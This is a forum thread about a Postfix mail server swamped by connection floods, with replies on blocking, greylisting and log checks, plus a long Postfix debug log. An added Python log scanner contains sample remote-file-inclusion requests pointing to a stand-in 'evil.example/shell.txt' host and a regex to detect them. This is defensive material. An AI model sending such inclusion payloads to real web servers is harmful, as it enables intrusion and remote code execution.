DDoS attack on Postfix server

inst0000

Hello everyone,

our e-mail server (Postfix) is currently being almost completely paralysed by a DDoS attack. Does anyone have a tip for me on how to receive mail despite the attack?

I have already blocked 4,000 sender IP addresses via the firewall, but no sooner are 100 addresses blocked than 300 new attackers apparently spring up immediately.

Grateful for any tip.

Regards
Ralf
 
Hello,

What speaks against blocking whole ranges?

Otherwise nothing else comes to mind right now...

Regards
Sinepp
 
Hi

Have you thought about greylisting? If they are only spambots it might help ...


They just call the smtpd, send nothing, wait a few seconds and then disconnect again. At the start of the attack I easily had 200 smtpd's in the system, which of course then ground to a halt.

Unfortunately they are not spambots. I called a few German companies that were among the attackers. Some of them were even using hardware appliances with SpamAssassin etc. for their attacks.

It seems you really are powerless.
 
Hello,

I hardly think it is a DDoS on your Postfix; more likely an insecure script through which masses of spam are now being fired via POST, or an injection with which a file containing tens of thousands of recipient addresses was uploaded and executed.

Only yesterday I cleaned a customer's server of something like that.

Have a look in the Apache logs of the suspicious site/customer for POST, or for "?http:" or "=http:".

Good luck ;-)
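An added example of the check suggested above, in Python; it is not the poster's tooling and not code from the thread. It scans Apache combined-format log lines for repeated POSTs to one script and for query strings that carry an embedded URL after "?" or "=", which is what the poster tells you to grep for. The log lines, the threshold of three POSTs, and the URL-decoding step (so that a percent-encoded "http://" is caught as well) are assumptions made for the demo.

```python
"""Scan Apache access-log lines for what the post above suggests: bursts of
POST requests to one script, and query strings carrying "?http:" / "=http:"
(the remote-file-inclusion signature). Added example, not the poster's own
tooling; the log lines are constructed for the demo."""
import re
from collections import Counter
from urllib.parse import unquote

# Constructed "combined" log-format sample, not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [06/Dec/2007:16:50:39 +0100] "POST /contact/sendmail.php HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.7 - - [06/Dec/2007:16:50:40 +0100] "POST /contact/sendmail.php HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.7 - - [06/Dec/2007:16:50:41 +0100] "POST /contact/sendmail.php HTTP/1.1" 200 512 "-" "Mozilla/4.0"
198.51.100.23 - - [06/Dec/2007:16:51:02 +0100] "GET /gallery/index.php?page=http://evil.example/shell.txt? HTTP/1.1" 200 9001 "-" "libwww-perl/5.8"
198.51.100.23 - - [06/Dec/2007:16:51:05 +0100] "GET /gallery/index.php?page=http%3A%2F%2Fevil.example%2Fshell.txt%3F HTTP/1.1" 200 9001 "-" "libwww-perl/5.8"
192.0.2.9 - - [06/Dec/2007:16:52:10 +0100] "GET /index.php?page=news HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)
# "?http:" / "=http:" from the post, plus "&" and ftp; matched on the decoded URL.
RFI_RE = re.compile(r'[?=&](?:https?|ftp):', re.IGNORECASE)


def parse_line(line):
    """Return a dict with ip/ts/method/url/status, or None for unparseable lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["url"] = unquote(rec["url"])   # catch percent-encoded http%3A%2F%2F too
    return rec


def scan(log_text, post_threshold=3):
    """Return (hot_posts, rfi): (ip, path) -> POST count at or above the threshold,
    and the list of (ip, url) requests whose query string embeds another URL."""
    posts = Counter()
    rfi = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST":
            posts[(rec["ip"], rec["url"].split("?", 1)[0])] += 1
        if RFI_RE.search(rec["url"]):
            rfi.append((rec["ip"], rec["url"]))
    hot_posts = {k: v for k, v in posts.items() if v >= post_threshold}
    return hot_posts, rfi


if __name__ == "__main__":
    hot, rfi = scan(SAMPLE_LOG)
    for (ip, path), n in hot.items():
        print(f"{n:4d} POSTs from {ip} to {path}")
    for ip, url in rfi:
        print(f"embedded URL from {ip}: {url}")
```

Feed the real access log to `scan()` instead of the constructed sample; a script that shows up under both lists (many POSTs and an embedded URL) is the first place to look.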
 
Log excerpt

Hello!
Do you have a log excerpt of these attacks?

Regards
Thorsten

Gladly! :

------------------------------------snip-------------------------------
Code:
Dec  6 16:50:39 mail postfix/smtpd[56782]: < lsh810.siteprotect.co.kr[66.232.138.26]: EHLO lsh810.siteprotect.co.kr
Dec  6 16:50:39 mail postfix/smtpd[56782]: > lsh810.siteprotect.co.kr[66.232.138.26]: 250-mail.XXXXXXX.com
Dec  6 16:50:39 mail postfix/smtpd[56782]: > lsh810.siteprotect.co.kr[66.232.138.26]: 250-PIPELINING
Dec  6 16:50:39 mail postfix/smtpd[56782]: > lsh810.siteprotect.co.kr[66.232.138.26]: 250-SIZE
Dec  6 16:50:39 mail postfix/smtpd[56782]: > lsh810.siteprotect.co.kr[66.232.138.26]: 250-VRFY
Dec  6 16:50:39 mail postfix/smtpd[56782]: > lsh810.siteprotect.co.kr[66.232.138.26]: 250-ETRN
Dec  6 16:50:39 mail postfix/smtpd[56782]: match_list_match: lsh810.siteprotect.co.kr: no match
Dec  6 16:50:39 mail postfix/smtpd[56782]: match_list_match: 66.232.138.26: no match
Dec  6 16:50:39 mail postfix/smtpd[56782]: > lsh810.siteprotect.co.kr[66.232.138.26]: 250 8BITMIME
Dec  6 16:50:39 mail postfix/smtpd[56782]: watchdog_pat: 2002b790
Dec  6 16:50:39 mail postfix/smtpd[36034]: < unknown[140.234.28.138]: RCPT TO:<vanyone@XXXXXXX.com>
Dec  6 16:50:39 mail postfix/smtpd[36034]: extract_addr: input: <vanyone@XXXXXXX.com>
Dec  6 16:50:39 mail postfix/smtpd[36034]: smtpd_check_addr: addr=vanyone@XXXXXXX.com
Dec  6 16:50:39 mail postfix/smtpd[36034]: send attr request = rewrite
Dec  6 16:50:39 mail postfix/smtpd[36034]: send attr rule = canonicalize
Dec  6 16:50:39 mail postfix/smtpd[36034]: send attr address = vanyone@XXXXXXX.com
Dec  6 16:50:39 mail postfix/smtpd[36034]: private/rewrite socket: wanted attribute: address
Dec  6 16:50:39 mail postfix/smtpd[36034]: input attribute name: address
Dec  6 16:50:39 mail postfix/smtpd[36034]: input attribute value: vanyone@XXXXXXX.com
Dec  6 16:50:39 mail postfix/smtpd[36034]: private/rewrite socket: wanted attribute: (list terminator)
Dec  6 16:50:39 mail postfix/smtpd[36034]: input attribute name: (end)
Dec  6 16:50:39 mail postfix/smtpd[36034]: rewrite_clnt: canonicalize: vanyone@XXXXXXX.com -> vanyone@XXXXXXX.com
Dec  6 16:50:39 mail postfix/smtpd[36034]: send attr request = resolve
Dec  6 16:50:39 mail postfix/smtpd[36034]: send attr address = vanyone@XXXXXXX.com
Dec  6 16:50:39 mail postfix/smtpd[36034]: private/rewrite socket: wanted attribute: transport
Dec  6 16:50:39 mail postfix/smtpd[36034]: input attribute name: transport
Dec  6 16:50:39 mail postfix/smtpd[36034]: input attribute value: local
Dec  6 16:50:39 mail postfix/smtpd[36034]: private/rewrite socket: wanted attribute: nexthop
Dec  6 16:50:39 mail postfix/smtpd[36034]: input attribute name: nexthop
Dec  6 16:50:39 mail postfix/smtpd[36034]: input attribute value: mail.XXXXXXX.com
Dec  6 16:50:39 mail postfix/smtpd[36034]: private/rewrite socket: wanted attribute: recipient
Dec  6 16:50:39 mail postfix/smtpd[36034]: input attribute name: recipient
Dec  6 16:50:39 mail postfix/smtpd[36034]: input attribute value: vanyone@XXXXXXX.com
Dec  6 16:50:39 mail postfix/smtpd[36034]: private/rewrite socket: wanted attribute: flags
Dec  6 16:50:39 mail postfix/smtpd[36034]: input attribute name: flags
Dec  6 16:50:39 mail postfix/smtpd[36034]: input attribute value: 256
Dec  6 16:50:39 mail postfix/smtpd[36034]: private/rewrite socket: wanted attribute: (list terminator)
Dec  6 16:50:39 mail postfix/smtpd[36034]: input attribute name: (end)
Dec  6 16:50:39 mail postfix/smtpd[36034]: resolve_clnt: `vanyone@XXXXXXX.com' -> transp=`local' host=`mail.XXXXXXX.com' rcpt=`vanyone@XXXXXXX.com' flags= class=local
Dec  6 16:50:39 mail postfix/smtpd[36034]: ctable_locate: install entry key vanyone@XXXXXXX.com
Dec  6 16:50:39 mail postfix/smtpd[36034]: extract_addr: result: vanyone@XXXXXXX.com
Dec  6 16:50:39 mail postfix/smtpd[36034]: >>> START Helo command RESTRICTIONS <<<
Dec  6 16:50:39 mail postfix/smtpd[36034]: generic_checks: name=permit_mynetworks
Dec  6 16:50:39 mail postfix/smtpd[36034]: permit_mynetworks: unknown 140.234.28.138
Dec  6 16:50:39 mail postfix/smtpd[36034]: match_hostname: unknown ~? 10.100.30.0/24
Dec  6 16:50:39 mail postfix/smtpd[36034]: match_hostaddr: 140.234.28.138 ~? 10.100.30.0/24
Dec  6 16:50:39 mail postfix/smtpd[36034]: match_hostname: unknown ~? 127.0.0.0/8
Dec  6 16:50:39 mail postfix/smtpd[36034]: match_hostaddr: 140.234.28.138 ~? 127.0.0.0/8
Dec  6 16:50:39 mail postfix/smtpd[36034]: match_list_match: unknown: no match
Dec  6 16:50:39 mail postfix/smtpd[36034]: match_list_match: 140.234.28.138: no match
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=permit_mynetworks status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unauth_destination
Dec  6 16:50:40 mail postfix/smtpd[36034]: reject_unauth_destination: vanyone@XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[36034]: permit_auth_destination: vanyone@XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[36034]: ctable_locate: leave existing entry key vanyone@XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unauth_destination status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_non_fqdn_sender
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_non_fqdn_sender status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_non_fqdn_recipient
Dec  6 16:50:40 mail postfix/smtpd[36034]: reject_non_fqdn_address: vanyone@XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_non_fqdn_recipient status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unknown_recipient_domain
Dec  6 16:50:40 mail postfix/smtpd[36034]: reject_unknown_address: vanyone@XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[36034]: ctable_locate: leave existing entry key vanyone@XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unknown_recipient_domain status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_non_fqdn_hostname
Dec  6 16:50:40 mail postfix/smtpd[36034]: reject_non_fqdn_hostname: v4sexchange.FSN
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_non_fqdn_hostname status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_invalid_hostname
Dec  6 16:50:40 mail postfix/smtpd[36034]: reject_invalid_hostname: v4sexchange.FSN
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_invalid_hostname status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unauth_pipelining
Dec  6 16:50:40 mail postfix/smtpd[36034]: reject_unauth_pipelining: RCPT
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unauth_pipelining status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: >>> END Helo command RESTRICTIONS <<<
Dec  6 16:50:40 mail postfix/smtpd[36034]: >>> START Sender address RESTRICTIONS <<<
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=permit_mynetworks
Dec  6 16:50:40 mail postfix/smtpd[36034]: permit_mynetworks: unknown 140.234.28.138
Dec  6 16:50:40 mail postfix/smtpd[36034]: match_hostname: unknown ~? 10.100.30.0/24
Dec  6 16:50:40 mail postfix/smtpd[36034]: match_hostaddr: 140.234.28.138 ~? 10.100.30.0/24
Dec  6 16:50:40 mail postfix/smtpd[36034]: match_hostname: unknown ~? 127.0.0.0/8
Dec  6 16:50:40 mail postfix/smtpd[36034]: match_hostaddr: 140.234.28.138 ~? 127.0.0.0/8
Dec  6 16:50:40 mail postfix/smtpd[36034]: match_list_match: unknown: no match
Dec  6 16:50:40 mail postfix/smtpd[36034]: match_list_match: 140.234.28.138: no match
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=permit_mynetworks status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unauth_destination
Dec  6 16:50:40 mail postfix/smtpd[36034]: reject_unauth_destination: vanyone@XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[36034]: permit_auth_destination: vanyone@XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[36034]: ctable_locate: leave existing entry key vanyone@XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unauth_destination status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_non_fqdn_sender
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_non_fqdn_sender status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_non_fqdn_recipient
Dec  6 16:50:40 mail postfix/smtpd[36034]: reject_non_fqdn_address: vanyone@XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_non_fqdn_recipient status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unknown_recipient_domain
Dec  6 16:50:40 mail postfix/smtpd[36034]: reject_unknown_address: vanyone@XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[36034]: ctable_locate: leave existing entry key vanyone@XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unknown_recipient_domain status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unauth_pipelining
Dec  6 16:50:40 mail postfix/smtpd[36034]: reject_unauth_pipelining: RCPT
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unauth_pipelining status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: >>> END Sender address RESTRICTIONS <<<
Dec  6 16:50:40 mail postfix/smtpd[36034]: >>> START Recipient address RESTRICTIONS <<<
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=permit_mynetworks
Dec  6 16:50:40 mail postfix/smtpd[36034]: permit_mynetworks: unknown 140.234.28.138
Dec  6 16:50:40 mail postfix/smtpd[36034]: match_hostname: unknown ~? 10.100.30.0/24
Dec  6 16:50:40 mail postfix/smtpd[36034]: match_hostaddr: 140.234.28.138 ~? 10.100.30.0/24
Dec  6 16:50:40 mail postfix/smtpd[36034]: match_hostname: unknown ~? 127.0.0.0/8
Dec  6 16:50:40 mail postfix/smtpd[36034]: match_hostaddr: 140.234.28.138 ~? 127.0.0.0/8
Dec  6 16:50:40 mail postfix/smtpd[36034]: match_list_match: unknown: no match
Dec  6 16:50:40 mail postfix/smtpd[36034]: match_list_match: 140.234.28.138: no match
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=permit_mynetworks status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_invalid_hostname
Dec  6 16:50:40 mail postfix/smtpd[36034]: reject_invalid_hostname: v4sexchange.FSN
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_invalid_hostname status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_non_fqdn_hostname
Dec  6 16:50:40 mail postfix/smtpd[36034]: reject_non_fqdn_hostname: v4sexchange.FSN
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_non_fqdn_hostname status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_non_fqdn_sender
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_non_fqdn_sender status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_non_fqdn_recipient
Dec  6 16:50:40 mail postfix/smtpd[36034]: reject_non_fqdn_address: vanyone@XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_non_fqdn_recipient status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unknown_sender_domain
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unknown_sender_domain status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unknown_recipient_domain
Dec  6 16:50:40 mail postfix/smtpd[36034]: reject_unknown_address: vanyone@XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[36034]: ctable_locate: leave existing entry key vanyone@XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unknown_recipient_domain status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unauth_pipelining
Dec  6 16:50:40 mail postfix/smtpd[36034]: reject_unauth_pipelining: RCPT
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unauth_pipelining status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unauth_destination
Dec  6 16:50:40 mail postfix/smtpd[36034]: reject_unauth_destination: vanyone@XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[36034]: permit_auth_destination: vanyone@XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[36034]: ctable_locate: leave existing entry key vanyone@XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=reject_unauth_destination status=0
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=permit
Dec  6 16:50:40 mail postfix/smtpd[36034]: generic_checks: name=permit status=1
Dec  6 16:50:40 mail postfix/smtpd[36034]: >>> CHECKING RECIPIENT MAPS <<<
Dec  6 16:50:40 mail postfix/smtpd[36034]: ctable_locate: leave existing entry key vanyone@XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[36034]: maps_find: recipient_canonical_maps: vanyone@XXXXXXX.com: not found
Dec  6 16:50:40 mail postfix/smtpd[36034]: maps_find: recipient_canonical_maps: vanyone: not found
Dec  6 16:50:40 mail postfix/smtpd[36034]: maps_find: recipient_canonical_maps: @XXXXXXX.com: not found
Dec  6 16:50:40 mail postfix/smtpd[36034]: mail_addr_find: vanyone@XXXXXXX.com -> (not found)
Dec  6 16:50:40 mail postfix/smtpd[36034]: maps_find: canonical_maps: vanyone@XXXXXXX.com: not found
Dec  6 16:50:40 mail postfix/smtpd[36034]: maps_find: canonical_maps: vanyone: not found
Dec  6 16:50:40 mail postfix/smtpd[36034]: maps_find: canonical_maps: @XXXXXXX.com: not found
Dec  6 16:50:40 mail postfix/smtpd[36034]: mail_addr_find: vanyone@XXXXXXX.com -> (not found)
Dec  6 16:50:40 mail postfix/smtpd[36034]: maps_find: virtual_alias_maps: vanyone@XXXXXXX.com: not found
Dec  6 16:50:40 mail postfix/smtpd[36034]: maps_find: virtual_alias_maps: vanyone: not found
Dec  6 16:50:40 mail postfix/smtpd[36034]: maps_find: virtual_alias_maps: @XXXXXXX.com: not found
Dec  6 16:50:40 mail postfix/smtpd[36034]: mail_addr_find: vanyone@XXXXXXX.com -> (not found)
Dec  6 16:50:40 mail postfix/smtpd[36034]: send attr request = lookup
Dec  6 16:50:40 mail postfix/smtpd[36034]: send attr table = unix:passwd.byname
Dec  6 16:50:40 mail postfix/smtpd[36034]: send attr flags = 64
Dec  6 16:50:40 mail postfix/smtpd[36034]: send attr key = vanyone@XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[36034]: private/proxymap socket: wanted attribute: status
Dec  6 16:50:40 mail postfix/smtpd[36034]: input attribute name: status
Dec  6 16:50:40 mail postfix/smtpd[36034]: input attribute value: 1
Dec  6 16:50:40 mail postfix/smtpd[36034]: private/proxymap socket: wanted attribute: value
Dec  6 16:50:40 mail postfix/smtpd[36034]: input attribute name: value
Dec  6 16:50:40 mail postfix/smtpd[36034]: input attribute value: (end)
Dec  6 16:50:40 mail postfix/smtpd[36034]: private/proxymap socket: wanted attribute: (list terminator)
Dec  6 16:50:40 mail postfix/smtpd[36034]: input attribute name: (end)
Dec  6 16:50:40 mail postfix/smtpd[36034]: dict_proxy_lookup: table=unix:passwd.byname flags=0100 key=vanyone@XXXXXXX.com -> status=1 result=
Dec  6 16:50:40 mail postfix/smtpd[36034]: maps_find: local_recipient_maps: vanyone@XXXXXXX.com: not found
Dec  6 16:50:40 mail postfix/smtpd[36034]: send attr request = lookup
Dec  6 16:50:40 mail postfix/smtpd[36034]: send attr table = unix:passwd.byname
Dec  6 16:50:40 mail postfix/smtpd[36034]: send attr flags = 64
Dec  6 16:50:40 mail postfix/smtpd[36034]: send attr key = vanyone
Dec  6 16:50:40 mail postfix/smtpd[36034]: private/proxymap socket: wanted attribute: status
Dec  6 16:50:40 mail postfix/smtpd[36034]: input attribute name: status
Dec  6 16:50:40 mail postfix/smtpd[36034]: input attribute value: 1
Dec  6 16:50:40 mail postfix/smtpd[36034]: private/proxymap socket: wanted attribute: value
Dec  6 16:50:40 mail postfix/smtpd[36034]: input attribute name: value
Dec  6 16:50:40 mail postfix/smtpd[36034]: input attribute value: (end)
Dec  6 16:50:40 mail postfix/smtpd[36034]: private/proxymap socket: wanted attribute: (list terminator)
Dec  6 16:50:40 mail postfix/smtpd[36034]: input attribute name: (end)
Dec  6 16:50:40 mail postfix/smtpd[36034]: dict_proxy_lookup: table=unix:passwd.byname flags=0100 key=vanyone -> status=1 result=
Dec  6 16:50:40 mail postfix/smtpd[36034]: maps_find: local_recipient_maps: vanyone: not found
Dec  6 16:50:40 mail postfix/smtpd[36034]: send attr request = lookup
Dec  6 16:50:40 mail postfix/smtpd[36034]: send attr table = unix:passwd.byname
Dec  6 16:50:40 mail postfix/smtpd[36034]: send attr flags = 64
Dec  6 16:50:40 mail postfix/smtpd[36034]: send attr key = @XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[36034]: private/proxymap socket: wanted attribute: status
Dec  6 16:50:40 mail postfix/smtpd[36034]: input attribute name: status
Dec  6 16:50:40 mail postfix/smtpd[36034]: input attribute value: 1
Dec  6 16:50:40 mail postfix/smtpd[36034]: private/proxymap socket: wanted attribute: value
Dec  6 16:50:40 mail postfix/smtpd[36034]: input attribute name: value
Dec  6 16:50:40 mail postfix/smtpd[36034]: input attribute value: (end)
Dec  6 16:50:40 mail postfix/smtpd[36034]: private/proxymap socket: wanted attribute: (list terminator)
Dec  6 16:50:40 mail postfix/smtpd[36034]: input attribute name: (end)
Dec  6 16:50:40 mail postfix/smtpd[36034]: dict_proxy_lookup: table=unix:passwd.byname flags=0100 key=@XXXXXXX.com -> status=1 result=
Dec  6 16:50:40 mail postfix/smtpd[36034]: maps_find: local_recipient_maps: @XXXXXXX.com: not found
Dec  6 16:50:40 mail postfix/smtpd[36034]: mail_addr_find: vanyone@XXXXXXX.com -> (not found)
Dec  6 16:50:40 mail postfix/smtpd[36034]: NOQUEUE: reject: RCPT from unknown[140.234.28.138]: 550 <vanyone@XXXXXXX.com>: Recipient address rejected: User unknown in local recipient table; from=<> to=<vanyone@XXXXXXX.com> proto=ESMTP helo=<v4sexchange.FSN>
Dec  6 16:50:40 mail postfix/smtpd[36034]: > unknown[140.234.28.138]: 550 <vanyone@XXXXXXX.com>: Recipient address rejected: User unknown in local recipient table
Dec  6 16:50:40 mail postfix/smtpd[36034]: watchdog_pat: 2002b790
Dec  6 16:50:40 mail postfix/smtpd[36034]: < unknown[140.234.28.138]: QUIT
Dec  6 16:50:40 mail postfix/smtpd[36034]: > unknown[140.234.28.138]: 221 Bye
Dec  6 16:50:40 mail postfix/smtpd[36034]: disconnect from unknown[140.234.28.138]
Dec  6 16:50:40 mail postfix/smtpd[36034]: master_notify: status 1
Dec  6 16:50:40 mail postfix/smtpd[36034]: connection closed
Dec  6 16:50:40 mail postfix/smtpd[36034]: watchdog_stop: 2002b790
Dec  6 16:50:40 mail postfix/smtpd[36034]: watchdog_start: 2002b790
Dec  6 16:50:40 mail postfix/smtpd[36034]: connection established
Dec  6 16:50:40 mail postfix/smtpd[36034]: master_notify: status 0
Dec  6 16:50:40 mail postfix/smtpd[36034]: name_mask: resource
Dec  6 16:50:40 mail postfix/smtpd[36034]: name_mask: software
Dec  6 16:50:40 mail postfix/smtpd[56782]: < lsh810.siteprotect.co.kr[66.232.138.26]: MAIL From:<> SIZE=17148
Dec  6 16:50:40 mail postfix/smtpd[56782]: extract_addr: input: <>
Dec  6 16:50:40 mail postfix/smtpd[56782]: smtpd_check_addr: addr=
Dec  6 16:50:40 mail postfix/smtpd[56782]: extract_addr: result: 
Dec  6 16:50:40 mail postfix/smtpd[56782]: fsspace: .: block size 512, blocks free 38619728
Dec  6 16:50:40 mail postfix/smtpd[56782]: smtpd_check_size: blocks 512 avail 38619728 min_free 0 msg_size_limit 0
Dec  6 16:50:40 mail postfix/smtpd[56782]: > lsh810.siteprotect.co.kr[66.232.138.26]: 250 Ok
Dec  6 16:50:40 mail postfix/smtpd[56782]: watchdog_pat: 2002b790
Dec  6 16:50:40 mail postfix/smtpd[36034]: connect from boumbo.gamerezo.com[62.93.224.107]
Dec  6 16:50:40 mail postfix/smtpd[36034]: match_list_match: boumbo.gamerezo.com: no match
Dec  6 16:50:40 mail postfix/smtpd[36034]: match_list_match: 62.93.224.107: no match
Dec  6 16:50:40 mail postfix/smtpd[36034]: match_list_match: boumbo.gamerezo.com: no match
Dec  6 16:50:40 mail postfix/smtpd[36034]: match_list_match: 62.93.224.107: no match
Dec  6 16:50:40 mail postfix/smtpd[36034]: > boumbo.gamerezo.com[62.93.224.107]: 220 mail.XXXXXXX.com ESMTP Postfix
Dec  6 16:50:40 mail postfix/smtpd[36034]: watchdog_pat: 2002b790
Dec  6 16:50:40 mail postfix/smtpd[36034]: < boumbo.gamerezo.com[62.93.224.107]: EHLO mail.k-network.com
Dec  6 16:50:40 mail postfix/smtpd[36034]: > boumbo.gamerezo.com[62.93.224.107]: 250-mail.XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[36034]: > boumbo.gamerezo.com[62.93.224.107]: 250-PIPELINING
Dec  6 16:50:40 mail postfix/smtpd[36034]: > boumbo.gamerezo.com[62.93.224.107]: 250-SIZE
Dec  6 16:50:40 mail postfix/smtpd[36034]: > boumbo.gamerezo.com[62.93.224.107]: 250-VRFY
Dec  6 16:50:40 mail postfix/smtpd[36034]: > boumbo.gamerezo.com[62.93.224.107]: 250-ETRN
Dec  6 16:50:40 mail postfix/smtpd[36034]: match_list_match: boumbo.gamerezo.com: no match
Dec  6 16:50:40 mail postfix/smtpd[36034]: match_list_match: 62.93.224.107: no match
Dec  6 16:50:40 mail postfix/smtpd[36034]: > boumbo.gamerezo.com[62.93.224.107]: 250 8BITMIME
Dec  6 16:50:40 mail postfix/smtpd[36034]: watchdog_pat: 2002b790
Dec  6 16:50:40 mail postfix/smtpd[56782]: < lsh810.siteprotect.co.kr[66.232.138.26]: RCPT To:<vprimarily@XXXXXXX.com>
Dec  6 16:50:40 mail postfix/smtpd[56782]: extract_addr: input: <vprimarily@XXXXXXX.com>
Dec  6 16:50:40 mail postfix/smtpd[56782]: smtpd_check_addr: addr=vprimarily@XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[56782]: send attr request = rewrite
Dec  6 16:50:40 mail postfix/smtpd[56782]: send attr rule = canonicalize
Dec  6 16:50:40 mail postfix/smtpd[56782]: send attr address = vprimarily@XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[56782]: private/rewrite socket: wanted attribute: address
Dec  6 16:50:40 mail postfix/smtpd[56782]: input attribute name: address
Dec  6 16:50:40 mail postfix/smtpd[56782]: input attribute value: vprimarily@XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[56782]: private/rewrite socket: wanted attribute: (list terminator)
Dec  6 16:50:40 mail postfix/smtpd[56782]: input attribute name: (end)
Dec  6 16:50:40 mail postfix/smtpd[56782]: rewrite_clnt: canonicalize: vprimarily@XXXXXXX.com -> vprimarily@XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[56782]: send attr request = resolve
Dec  6 16:50:40 mail postfix/smtpd[56782]: send attr address = vprimarily@XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[56782]: private/rewrite socket: wanted attribute: transport
Dec  6 16:50:40 mail postfix/smtpd[56782]: input attribute name: transport
Dec  6 16:50:40 mail postfix/smtpd[56782]: input attribute value: local
Dec  6 16:50:40 mail postfix/smtpd[56782]: private/rewrite socket: wanted attribute: nexthop
Dec  6 16:50:40 mail postfix/smtpd[56782]: input attribute name: nexthop
Dec  6 16:50:40 mail postfix/smtpd[56782]: input attribute value: mail.XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[56782]: private/rewrite socket: wanted attribute: recipient
Dec  6 16:50:40 mail postfix/smtpd[56782]: input attribute name: recipient
Dec  6 16:50:40 mail postfix/smtpd[56782]: input attribute value: vprimarily@XXXXXXX.com
Dec  6 16:50:40 mail postfix/smtpd[56782]: private/rewrite socket: wanted attribute: flags
Dec  6 16:50:40 mail postfix/smtpd[56782]: input attribute name: flags
Dec  6 16:50:40 mail postfix/smtpd[56782]: input attribute value: 256
Dec  6 16:50:40 mail postfix/smtpd[56782]: private/rewrite socket: wanted attribute: (list terminator)
Dec  6 16:50:40 mail postfix/smtpd[56782]: input attribute name: (end)
